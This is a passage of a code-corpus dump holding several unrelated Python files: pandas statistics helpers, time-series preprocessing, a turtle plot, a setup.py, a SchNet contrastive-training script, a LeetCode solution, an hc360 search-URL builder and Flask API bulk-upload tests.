最大值,最小值,均值,标准差,空缺值频数,空缺值比例,以及分布图,默认为means\n@p 打印输出:0~不打印,~打印,默认为打印.\n\n'''\ndef draw_ctn(data,colname,stat=\"means\",p=1,**kwargs):\n v = data[colname]\n if stat.lower()==\"means\":\n d = {}\n d[\"dtype\"] = v.dtype\n d[\"max\"] = v.max()\n d[\"min\"] = v.min()\n d[\"mean\"] = v.mean()\n d[\"std\"] = v.std()\n d[\"skew\"]=v.skew()\n d[\"kurt\"]=v.kurt()\n valueNull=v.isnull().value_counts()\n if True in valueNull.index:\n d[\"NA\"]=valueNull[True]\n else:\n d[\"NA\"]=0\n d[\"NArate\"]=d[\"NA\"]/v.shape[0]\n if p:\n print(d)\n print(ggplot(data, aes(x=colname)) + geom_bar(binwidth=kwargs.get(\"binwidth\", (d[\"max\"] - d[\"min\"]) / 10),stat=\"identity\"))\n return d\n\n\n'''\n对离散类型的列进行描述性统计\n:return dict\n@data 数据,格式要求列表或者DataFrame\n@colname 要统计的列名\n@stat 统计内容,means:基本统计包含 最大值,最小值,均值,标准差,空缺值频数,以及分布图,默认为means\n@p 打印输出:0~不打印,1~打印,默认为打印.\n\n'''\ndef draw_dsct(data, colname,stat=\"means\",p=1):\n v=data[colname]\n if stat.lower()==\"means\":\n vount = v.value_counts()\n d = {}\n d[\"dtype\"] = v.dtype\n d[\"maxId\"] = vount.idxmax()\n d[\"max\"]=vount.max()\n d[\"minId\"]=vount.idxmin()\n d[\"min\"] = vount.min()\n d[\"mean\"] = vount.mean()\n d[\"std\"] = vount.std()\n d[\"skew\"]=vount.skew()\n d[\"kurt\"]=vount.kurt()\n\n valueNull=v.isnull().value_counts()\n if True in valueNull.index:\n d[\"NA\"]=valueNull[True]\n else:\n d[\"NA\"]=0\n d[\"NArate\"]=d[\"NA\"]/v.shape[0]\n\n if p:\n print(d)\n print(ggplot(data, aes(x=colname)) + geom_bar(stat=\"bin\"))\n return d\n\n#0单边,1双边\n\n\n'''\n对所选择的列进行描述性统计\n:return three dict dx~x的统计值,dy~y的统计值,dxy~xy的统计值\n@data 数据:DataFrame.\n@xlabel,ylabel 要比较的两个列列名:String/int.\n@xtype,ytype 对应两列的数据类型:\"continuous\" 或者 \"discrete\",默认为\"continuous\".\n@stat 统计内容:\"means\"~基本统计包含 最大值,最小值,均值,标准差,空缺值频数,以及分布图,默认为\"means\".\n@NaNaction 空缺值的处理方式:\"N\"~忽略,默认为忽略.\n@p 打印输出:0~不打印,1~打印,默认为1.\n\n'''\ndef feature_discribler(data,xlabel,ylabel=0,xtype=\"continuous\",ytype=\"continuous\",stat=\"means\",NaNaction=\"n\",p=1,**kwargs):\n if data.__class__==list:\n data=pd.DataFrame(data)\n if NaNaction.lower()==\"n\":\n #查看两个变量的基本情况。\n dx=feature_stater(data, xlabel, xtype, stat, NaNaction,p=p,**kwargs)\n input()\n dy=feature_stater(data,ylabel,ytype,stat,NaNaction,p=p,**kwargs)\n input()\n p=ggplot(data,aes(x=xlabel,y=ylabel))\n if xtype.lower()==\"continuous\" and ytype.lower()==\"continuous\":\n dxy={}\n dxy[\"corr\"]=data[xlabel].corr(data[ylabel],method=kwargs.get(\"corr_method\",\"pearson\"))\n if p:\n print(dxy)\n print(p+geom_point())\n if xtype.lower()==\"discrete\" and ytype.lower()==\"discrete\":\n dxy={}\n\n dx[\"shanon\"]=shannon(data[xlabel],**kwargs)\n dy[\"shanon\"]=shannon(data[ylabel],**kwargs)\n dxy[\"ySx\"]=dshannon(data,ylabel,xlabel)\n dxy[\"xSy\"]=dshannon(data,xlabel,ylabel)\n\n if p:\n print(dxy)\n print(p+geom_point())\n\n if xtype.lower()==\"discrete\" and ytype.lower()==\"continuous\":\n dxy={}\n dx[\"shannon\"]=shannon(data[xlabel],**kwargs)\n #显著性检验,U检验\n split_by_x=data[xlabel].value_counts().index.map(lambda x: data[ylabel][data[xlabel] == x])\n dxy[\"xUy\"]=split_by_x.map(lambda x:U_test(x,data[xlabel]))\n\n if p:\n print(dxy)\n print(p+geom_boxplot())\n\n if ytype.lower()==\"continuous\" and ytype.lower()==\"discrete\":\n dxy={}\n dy[\"shannon\"]=shannon(data[ytype])\n #显著性检验,U检验\n split_by_y = data[ylabel].value_counts().index.map(lambda x: data[xlabel][data[ylabel] == x])\n dxy[\"yUx\"] = split_by_y.map(lambda x: U_test(x, data[ylabel]))\n\n if p:\n print(dxy)\n print(p+geom_point())\n else:\n print(\"please convert to list or DataFrame\")\n\n\ndef data_discribler(data,head=5,tail=5,corr_method=\"pearson\",NaNaction=\"N\"):\n print(\"data's head:\")\n print(data.head(head))\n\n print(\"data's tail\")\n print(data.tail(tail))\n\n print(\"cor matrix of nson\")\n corr=data.corr(corr_method)\n if nan in corr:\n print(\"Wrong!! nan in data\")\n print(corr)\n\n\n\n","sub_path":"python/python/data_discrible.py","file_name":"data_discrible.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"160923709","text":"import time, pandas as pd, numpy as np\nfrom pandas import Series\nfrom sklearn.preprocessing import MinMaxScaler\n\n\npd.set_option('display.max_columns', 100)\n\ntime_sequence_length_per_sample = 500\n\n\n\n\n'''method to create a differenced series to make the time-series data stationary'''\ndef difference(timeseries, interval=1): #shape of timeseries is (2499399, 1)\n\n diff = list()\n '''Converting pandas dataframe to numpy array so that we can reshape'''\n timeseries = timeseries.values\n timeseries = timeseries.reshape((-1,1))\n for i in range(interval, len(timeseries)):\n\n\n #print(timeseries[i-interval])\n\n value = timeseries[i] - timeseries[i - interval]\n\n diff.append(value)\n\n\n '''Check if the differencing happended properly or not'''\n\n if (timeseries[1]-timeseries[0] != diff[0] and timeseries[2]-timeseries[1] != diff[1] ):\n print(\"difference() method did not function as required in preprocessing_bitcoin.py file.\")\n print(\"The first two difference values are: \", diff[0], diff[1])\n\n return Series(diff)\n\n\n\n'''method to reverse the differenced series to recover the original values'''\ndef inverse_difference(history, yhat, interval):#bitcoin_price_csv, differenced[i], len(bitcoin_price_csv) - i\n return yhat + history.iloc[-interval]\n\n'''No, linear transformations of the response/ target regression values are never necessary.'''\n\n\n\n'''scale train and test features to [-1, 1]'''\ndef scale(features):\n print(\"Scaling the features of the timeseries.\\n\")\n\n scaler = MinMaxScaler(feature_range=(-1, 1)) #Transforms features( axis = 0) by scaling each feature to a given range.\n scaler = scaler.fit(features)\n # transform train\n features = features.reshape(features.shape[0], features.shape[1])\n train_and_test_features_scaled = scaler.transform(features)\n\n '''You need to apply normalisation to test data features, if your algorithm works with or needs normalised training data.\n The scaling is also a representation of the input.\n Not only do you need normalisation, but you should apply the exact same scaling as for your training data.\n However, note that you do not have to scale the labels.\n '''\n return scaler, train_and_test_features_scaled\n\n\n'''Reverse scaling for a forecasted value'''\ndef invert_scale(scaler, X, value):\n new_row = [x for x in X] + [value]\n array = np.array(new_row)\n array = array.reshape(1, len(array))\n inverted = scaler.inverse_transform(array)\n return inverted[0, -1]\n\ndef build_final_csv_for_cpu_usage(time_sequence_length):\n\n path_to_combined_dataset_with_no_head_or_tail = \"../data/final_cpu_usage.csv\"\n\n cpu_usage_csv = pd.read_csv(path_to_combined_dataset_with_no_head_or_tail,header=None, index_col= None) # load the data set -make sure u read with header = None....IMP here\n\n '''make the data stationary'''\n differenced_bitcoin_price = difference(cpu_usage_csv, 1)\n\n '''Check to see if the inverse method works or not'''\n inverted = list()\n for i in range(len(differenced_bitcoin_price)):\n\n value = inverse_difference(cpu_usage_csv, differenced_bitcoin_price[i], len(cpu_usage_csv) - i)#history, yhat, interval=1\n inverted.append(value)\n inverted = Series(inverted)\n print(\"Inverted head: (does not contain the first sample of the time series.)\\n \",inverted.head())\n\n '''use the differenced data for timeseries prediction'''\n cpu_usage_csv = np.array(differenced_bitcoin_price)\n\n #In pandas, indices are supposed to be immutable\n\n\n '''Convert the time-series problem into a supervised learning problem'''\n timeseries_dataset_sequence= []\n timeseries_dataset_labels= []\n\n\n#-----------------------------------------------------------training dataset\n for i in range(len(cpu_usage_csv)):\n\n timeseries_dataset_temp = np.zeros((time_sequence_length))\n\n if i < len(cpu_usage_csv) - time_sequence_length:\n for j in range(time_sequence_length):\n timeseries_dataset_temp[j] = (cpu_usage_csv[i + j])\n\n timeseries_dataset_sequence.append(timeseries_dataset_temp)\n\n timeseries_dataset_labels.append(cpu_usage_csv[i + time_sequence_length])\n\n\n\n\n timeseries_dataset_sequence = np.array(timeseries_dataset_sequence)\n\n\n\n timeseries_dataset_labels = np.array(timeseries_dataset_labels)\n\n\n\n\n '''scale the features before stacking with the regression labels'''\n scaler, timeseries_dataset_sequence = scale(timeseries_dataset_sequence)\n\n print(timeseries_dataset_sequence.shape) #354, 10\n print(timeseries_dataset_labels.shape) #354,\n '''stack the scaled features with unscaled targets'''\n final_training_and_testing_dataset = np.column_stack((timeseries_dataset_sequence, timeseries_dataset_labels))\n\n\n '''Let us comment the following line and make the dataset not shuffled by default.'''\n #np.random.shuffle(final_training_and_testing_dataset)\n\n\n print(\"final_bitcoin_price_data_after_preprocessing shape\", final_training_and_testing_dataset.shape) #(2499299, 101), 100 less than 2499399\n np.savetxt(\"../data/cpu_usage_after_preprocessing_500_timesteps.csv\", final_training_and_testing_dataset, delimiter=\",\")\n\n\n\n\n print(\"Dataset creation completed successfully.\\n\")\n\n#----------------------------VVI the op is shhuffled so the order is not preserved but everything is still correct--------------\n\nif __name__ == \"__main__\":\n build_final_csv_for_cpu_usage(time_sequence_length_per_sample)\n","sub_path":"CPU_Usage/preprocessing_fourth_step_DONOT_USE.py","file_name":"preprocessing_fourth_step_DONOT_USE.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"57290831","text":"__author__ = 'lunahc'\n\nData = [{'x':0, 'y':22},\n {'x':3, 'y':21},\n {'x':6, 'y':19},\n {'x':9, 'y':24},\n {'x':12, 'y':28},\n {'x':15, 'y':29},\n {'x':18, 'y':26},\n {'x':21, 'y':24},\n {'x':24, 'y':21}] # 08/29 서울시 강남구 시간별 기온\n\nclass Graph:\n def __init__(self, sizeX, sizeY):\n import turtle\n self.T = turtle.Turtle()\n screen = self.T.getscreen()\n screen.setworldcoordinates(-sizeX, -sizeY, sizeX, sizeY)\n\n def draw_graph(self, data):\n self.Teleport(data[0]['x'], data[0]['y'])\n for i in data:\n self.T.goto(i['x'], i['y'])\n\n def Teleport(self, x, y):\n self.T.up()\n self.T.goto(x, y)\n self.T.down()\n\nT = Graph(24, 30)\nT.draw_graph(Data)","sub_path":"Day4/TurtleGraph.py","file_name":"TurtleGraph.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47103076","text":"from setuptools import setup\n\nwith open('README.md', 'rt') as f:\n long_description = f.read()\n\nsetup(name='scibot',\n version='0.0.2',\n description='curation workflow automation and coordination',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/SciCrunch/scibot',\n author='Tom Gillespie',\n author_email='tgbugs@gmail.com',\n license='Apache 2.0',\n classifiers=[],\n keywords='rrid curation biocuration hypothesis hypothes.is web annotation',\n packages=['scibot'],\n install_requires=[\n 'curio',\n 'docopt',\n 'flask',\n 'gevent',\n 'gunicorn',\n 'hyputils',\n 'lxml',\n 'pyontutils>=0.0.5',\n ],\n extras_require={},\n scripts=['bin/scibot-bookmarklet', 'bin/scibot-dashboard'],\n entry_points={\n 'console_scripts': [\n 'scibot-sync=scibot.sync:main'\n ],\n },\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"653152002","text":"import torch\nimport torch.nn as nn\nimport torch_geometric\nimport numpy as np\nimport datetime\nimport scipy\nimport gzip\nimport math\nimport rdkit\nimport rdkit.Chem\nfrom rdkit.Chem import TorsionFingerprints\nfrom collections import defaultdict\nimport pandas as pd\nfrom tqdm import tqdm\nfrom copy import deepcopy\nimport random\n\nimport os\nimport sys\nimport json\nfrom model.params_interpreter import string_to_object \n\nfrom model.gnn_3D.schnet import SchNet\nfrom model.gnn_3D.dimenet_pp import DimeNetPlusPlus\nfrom model.gnn_3D.spherenet import SphereNet\n\nfrom torch_geometric.nn.acts import swish\n\nfrom model.gnn_3D.train_functions import classification_loop, contrastive_loop, binary_ranking_regression_loop\n\nfrom model.gnn_3D.train_models import train_classification_model, train_contrastive_model, train_binary_ranking_regression_model\n\nfrom model.datasets_samplers import Dataset_3D_GNN, StereoBatchSampler, SiameseBatchSampler, Sample_Map_To_Positives, Sample_Map_To_Negatives, NegativeBatchSampler, SingleConformerBatchSampler\n\nimport sklearn\n\nargs = sys.argv\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nprint('reading data...')\n\n# READ HYPERPARAMETERS\nwith open(str(args[1])) as f: # args[1] should contain path to params.json file\n params = json.load(f)\n\nseed = params['random_seed']\nrandom.seed(seed)\nnp.random.seed(seed = seed)\ntorch.manual_seed(seed)\n \ntrain_dataframe = pd.read_pickle(params['train_datafile'])\nval_dataframe = pd.read_pickle(params['validation_datafile'])\n\nif params['select_N_enantiomers']: # number of enantiomers to include for training; default = null \n smiles_nostereo = list(set(train_dataframe.SMILES_nostereo))\n random.shuffle(smiles_nostereo)\n select_smiles_nostereo = smiles_nostereo[0:params['select_N_enantiomers']]\n train_dataframe = train_dataframe[train_dataframe.SMILES_nostereo.isin(select_smiles_nostereo)].sort_values('SMILES_nostereo').reset_index(drop = True)\n\n\n# CREATE DIRECTORY FOR SAVING/CHECKPOINTING\nsave = params['save']\n\nPATH = args[2] # should contain path to subfolder where files will be saved\nif PATH[-1] != '/':\n PATH = PATH + '/'\n\nif not os.path.exists(PATH) and save == True:\n os.makedirs(PATH)\n\n#CREATE MODEL\nrandom.seed(seed)\nnp.random.seed(seed = seed)\ntorch.manual_seed(seed)\n\nprint('creating model...')\n\nmodel = SchNet(hidden_channels = params['hidden_channels'], # 128\n num_filters = params['num_filters'], # 128\n num_interactions = params['num_interactions'], # 6\n num_gaussians = params['num_gaussians'], # 50\n cutoff = params['cutoff'], # 10.0\n max_num_neighbors = params['max_num_neighbors'], # 32\n out_channels = params['out_channels'], # 1\n readout = 'add',\n dipole = False,\n mean = None,\n std = None,\n atomref = None, \n MLP_hidden_sizes = [], # [] for contrastive\n )\n\nif params['pretrained'] != \"\":\n print('loading pretrained weights...')\n model.load_state_dict(torch.load(params['pretrained'], map_location=next(model.parameters()).device), strict=False)\n\nmodel.to(device)\n\n# DEFINE OPTIMIZERS\nlr = params['lr']\noptimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr = lr)\n\n# Choosing Loss\nloss_function = params['loss_function']\n\n# only for contrastive learning\nmargin = params['margin']\n\n# only for docking\nabsolute_penalty = params['absolute_penalty'] # default is 1.0\nrelative_penalty = params['relative_penalty'] # default is None (null). If a float >=0.0, we have to use a SiameseBatchSampler\n\n# BUILDING DATA LOADERS\nbatch_size = params['batch_size']\n\n# only for SiameseBatchSampler\nN_pos = params['N_pos']\nN_neg = params['N_neg']\nstratified = params['stratified']\nwithoutReplacement = params['withoutReplacement']\n\n# only for StereoBatchSampler\ngrouping = params['grouping'] # one of ['none', 'stereoisomers', 'graphs']\n\n# selecting iteration style\nif params['iteration_mode'] == 'stereoisomers':\n single_conformer_train_dataframe = train_dataframe.groupby('ID').sample(1)\n single_conformer_val_dataframe = val_dataframe.groupby('ID').sample(1)\n \n BatchSampler_train = SingleConformerBatchSampler(single_conformer_train_dataframe,\n train_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n\n BatchSampler_val = SingleConformerBatchSampler(single_conformer_val_dataframe,\n val_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n \nelif params['iteration_mode'] == 'conformers':\n BatchSampler_train = SiameseBatchSampler(train_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n\n BatchSampler_val = SiameseBatchSampler(val_dataframe, \n batch_size,\n N_pos = N_pos,\n N_neg = N_neg, \n withoutReplacement = withoutReplacement, \n stratified = stratified)\n \n\ntrain_dataset = Dataset_3D_GNN(train_dataframe, \n regression = '', # top_score, RS_label_binary, sign_rotation\n )\n\nval_dataset = Dataset_3D_GNN(val_dataframe, \n regression = '', # top_score, RS_label_binary, sign_rotation\n )\n\nnum_workers = params['num_workers']\ntrain_loader = torch_geometric.data.DataLoader(train_dataset, batch_sampler = BatchSampler_train, num_workers = num_workers)\nval_loader = torch_geometric.data.DataLoader(val_dataset, batch_sampler = BatchSampler_val, num_workers = num_workers)\n\n\n# BEGIN TRAINING\nweighted_sum = params['weighted_sum'] # only for StereoBatchSampler\n\nif not os.path.exists(PATH + 'checkpoint_models') and save == True:\n os.makedirs(PATH + 'checkpoint_models')\n\nN_epochs = params['N_epochs']\n\ntrain_contrastive_model(model, \n train_loader, \n val_loader, \n N_epochs = N_epochs, \n optimizer = optimizer, \n device = device, \n loss_function = loss_function, \n batch_size = batch_size, \n margin = margin, \n save = save, \n PATH = PATH)\n\nprint('completed process')\n","sub_path":"training_scripts/training_contrastive_schnet.py","file_name":"training_contrastive_schnet.py","file_ext":"py","file_size_in_byte":7375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"135295007","text":"\"\"\"\nArithmetic Slices II - Subsequence\nGiven an integer array nums, return the number of all the arithmetic subsequences of nums.\n\nA sequence of numbers is called arithmetic if it consists of at least three elements and if the difference between any two consecutive elements is the same.\n\nFor example, [1, 3, 5, 7, 9], [7, 7, 7, 7], and [3, -1, -5, -9] are arithmetic sequences.\nFor example, [1, 1, 2, 5, 7] is not an arithmetic sequence.\nA subsequence of an array is a sequence that can be formed by removing some elements (possibly none) of the array.\n\nFor example, [2,5,10] is a subsequence of [1,2,1,2,4,1,5,10].\nThe test cases are generated so that the answer fits in 32-bit integer.\n\n\n\nExample 1:\n\nInput: nums = [2,4,6,8,10]\nOutput: 7\nExplanation: All arithmetic subsequence slices are:\n[2,4,6]\n[4,6,8]\n[6,8,10]\n[2,4,6,8]\n[4,6,8,10]\n[2,4,6,8,10]\n[2,6,10]\nExample 2:\n\nInput: nums = [7,7,7,7,7]\nOutput: 16\nExplanation: Any subsequence of this array is arithmetic.\n\n\nConstraints:\n\n1 <= nums.length <= 1000\n-231 <= nums[i] <= 231 - 1\n\"\"\"\nfrom collections import Counter, defaultdict\nfrom typing import List\n\n\nclass Solution:\n def numberOfArithmeticSlices(self, nums: List[int]) -> int:\n # Solution 1 - 1196 ms\n \"\"\"\n total, n = 0, len(nums)\n dp = [Counter() for item in nums]\n for i in range(n):\n for j in range(i):\n dp[i][nums[i] - nums[j]] += (dp[j][nums[i] - nums[j]] + 1)\n total += sum(dp[i].values())\n\n return total - (n - 1) * n // 2\n \"\"\"\n # Solution 2 - 128 ms\n positions = defaultdict(list)\n n = len(nums) - 1\n for i, a in enumerate(reversed(nums)):\n positions[a].append(n - i)\n previous = defaultdict(int)\n subseqs = [defaultdict(int) for _ in range(len(nums))]\n for i, a in enumerate(nums):\n del positions[a][-1]\n if not positions[a]:\n del positions[a]\n if len(positions) > len(previous):\n for b in previous:\n c = (a << 1) - b\n if c in positions:\n n = previous[b] + subseqs[i][b]\n for j in positions[c]:\n if j <= i:\n break\n subseqs[j][a] += n\n else:\n for c in positions:\n b = (a << 1) - c\n if b in previous:\n n = previous[b] + subseqs[i][b]\n for j in positions[c]:\n subseqs[j][a] += n\n previous[a] += 1\n return sum(sum(p.values()) for p in subseqs)\n\n\n# Main Call\nnums = [2, 4, 6, 8, 10]\nsolution = Solution()\nprint(solution.numberOfArithmeticSlices(nums))\n","sub_path":"src/arrays/numberOfArithmeticSlices_II.py","file_name":"numberOfArithmeticSlices_II.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"215797408","text":"# -*- coding: utf-8 -*-\nimport urllib\n\ni_list = [\n u'礼品工艺品',\\\n u'IT',\\\n u'电子',\\\n u'安防',\\\n u'化工',\\\n u'汽车配件',\\\n u'机械工业',\\\n u'酒店',\\\n u'汽车用品',\\\n u'工程机械',\\\n u'水工业',\\\n u'服装',\\\n u'运动休闲',\\\n u'医药',\\\n u'家居用品',\\\n u'医疗器械',\\\n u'办公用品',\\\n u'建材',\\\n u'广电',\\\n u'家电',\\\n u'影音',\\\n u'五金',\\\n u'塑料',\\\n u'农林牧副渔',\\\n u'通信',\\\n u'纺织',\\\n u'纸业',\\\n u'珠宝首饰',\\\n u'印刷',\\\n u'汽车',\\\n u'冶金矿产',\\\n u'玩具',\\\n u'服装',\\\n u'教育',\\\n u'运动休闲',\\\n u'广告',\\\n u'消防',\\\n u'商业服务',\\\n u'钢铁',\\\n u'交通运输',\\\n u'音响灯光',\\\n u'激光光电子',\\\n u'摩托车及配件',\\\n u'能源',\\\n u'食品工业',\\\n u'机床',\\\n u'房地产',\\\n u'灯饰',\\\n u'环保',\\\n u'丝印特印',\\\n u'美容美发',\\\n u'图书出版',\\\n u'泵阀',\\\n u'卫浴洁具',\\\n u'制药工业',\\\n u'石油',\\\n u'建筑陶瓷',\\\n u'电气',\\\n u'办公用品',\\\n]\n\ndef get_extra_urls():\n w = u'电子'\n w = w.encode('gb2312')\n z=u'中国:广东省:深圳市'\n z = z.encode('gb2312')\n url_list = []\n for i in i_list:\n i= i.encode('gb2312')\n if i==u'电子'.encode('gb2312'):\n for j in range(7):\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\",'j':str(j+1)}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n else:\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\"}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n\n\n w = u'电子'\n w = w.encode('gb2312')\n z=u'中国:广东省:广州市'\n z = z.encode('gb2312')\n for i in i_list:\n i= i.encode('gb2312')\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\"}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n\n w = u'电子'\n w = w.encode('gb2312')\n z=u'中国:广东省:东莞市'\n z = z.encode('gb2312')\n for i in i_list:\n i= i.encode('gb2312')\n m = {'i':i,'w':w,'z':z,'mc':\"enterprise\"}\n s = urllib.urlencode(m)\n url = \"http://s.hc360.com/?%s\"%s\n url_list.append(url)\n\n return url_list\n\n","sub_path":"huicong/huicong/spiders/exter_url.py","file_name":"exter_url.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"502740575","text":"import pytest\nfrom app import db, models\nfrom sqlalchemy.orm import joinedload\n\n# GET /api/pipelines\n\n\ndef test_get_pipelines(test_database, client, login_as):\n # Not much to test here, if the endpoint is updated please add more tests\n # Test success\n login_as(\"admin\")\n response = client.get(\"/api/pipelines\")\n assert response.status_code == 200\n assert len(response.get_json()) == 2\n\n\n# GET /api/enums\n\n\ndef test_get_enums(test_database, client, login_as):\n # Test success\n login_as(\"admin\")\n response = client.get(\"/api/enums\")\n assert response.status_code == 200\n assert len(response.get_json()) == 10\n for enumType, enums in response.get_json().items():\n assert enumType is not None\n\n\n# GET /api/metadatasettypes\ndef test_get_metadatasettypes(test_database, client, login_as):\n login_as(\"admin\")\n response = client.get(\"/api/metadatasettypes\")\n assert response.status_code == 200\n assert len(response.get_json()) == 4\n for _, dataset_types in response.get_json().items():\n assert dataset_types is not None and isinstance(dataset_types, list)\n\n\n# GET api/institutions\n\n\ndef test_get_institutions(test_database, client, login_as):\n login_as(\"admin\")\n response = client.get(\"/api/institutions\")\n assert response.status_code == 200\n assert len(response.get_json()) == 21\n for institution in response.get_json():\n assert institution is not None\n\n\n# POST /api/_bulk\ndef test_post_bulk(test_database, client, login_as):\n login_as(\"admin\")\n # Test invalid csv\n badsamplecsv = open(\"tests/badsamplecsv.csv\", \"r\")\n assert (\n client.post(\n \"/api/_bulk\",\n data=badsamplecsv.read(),\n headers={\"Content-Type\": \"text/csv\"},\n ).status_code\n == 400\n )\n # Test not json array\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json={\n \"family_codename\": \"1001\",\n \"participant_codename\": \"06332\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"gender\": \"Male\",\n \"participant_type\": \"Parent\",\n },\n ).status_code\n == 422\n )\n\n # Test enum error\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"ANYTHING ELSE\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"DEFINITELY NOT AN ENUM\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"gender\": \"Male\",\n \"participant_type\": \"Parent\",\n }\n ],\n ).status_code\n == 400\n )\n\n # Test json array\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n },\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"3420\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WES\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n },\n ],\n ).status_code\n == 200\n )\n # Test csv\n goodcsv = open(\"tests/samplecsv.csv\", \"r\")\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n data=goodcsv.read(),\n headers={\"Content-Type\": \"text/csv\"},\n ).status_code\n == 200\n )\n\n # Test sequencing_date is provided\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n },\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"3420\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WES\",\n \"condition\": \"GermLine\",\n },\n ],\n ).status_code\n == 400\n )\n\n # Test invalid group query\n assert (\n client.post(\n \"/api/_bulk?groups=torgen&\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 404\n )\n\n # Test correct permission group\n response = client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n )\n\n assert response.status_code == 200\n # check that dataset is linked to group specified in query\n dataset = response.get_json()\n dataset_id = dataset[0][\"dataset_id\"]\n dataset_group = (\n models.Dataset.query.join(models.Dataset.groups)\n .filter(\n models.Group.group_code == \"ach\", models.Dataset.dataset_id == dataset_id\n )\n .one_or_none()\n )\n assert dataset_group is not None\n\n # Test no permission group specified but belongs to multiple groups\n assert (\n client.post(\n \"/api/_bulk\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 400\n )\n\n # Check db for both csv result and json array result\n\n family = (\n models.Family.query.options(joinedload(models.Family.participants))\n .filter(models.Family.family_codename == \"1001\")\n .one_or_none()\n )\n assert family is not None\n assert len(family.participants) == 2\n\n # part = (\n # models.Participant.query\n # .filter(models.Participant.participant_codename == \"06332\")\n # .one_or_none()\n # )\n # assert part.created is None\n\n family = (\n models.Family.query.options(joinedload(models.Family.participants))\n .filter(models.Family.family_codename == \"FAM01\")\n .one_or_none()\n )\n assert family is not None\n assert len(family.participants) == 3\n\n random_participant = (\n models.Participant.query.options(\n joinedload(models.Participant.tissue_samples).joinedload(\n models.TissueSample.datasets\n )\n )\n .filter(models.Participant.participant_codename == \"PTP02\")\n .one_or_none()\n )\n assert random_participant is not None\n assert len(random_participant.tissue_samples) == 1\n assert len(random_participant.tissue_samples[0].datasets) == 1\n\n\ndef test_post_bulk_user(test_database, client, login_as):\n login_as(\"user\")\n # Test allowed permission groups\n assert (\n client.post(\n \"/api/_bulk?groups=ach\",\n json=[\n {\n \"family_codename\": \"1001\",\n \"participant_codename\": \"1411\",\n \"tissue_sample\": \"Blood\",\n \"tissue_sample_type\": \"Blood\",\n \"dataset_type\": \"WGS\",\n \"condition\": \"GermLine\",\n \"sequencing_date\": \"2020-12-17\",\n }\n ],\n ).status_code\n == 200\n )\n # Test no group query parameter, 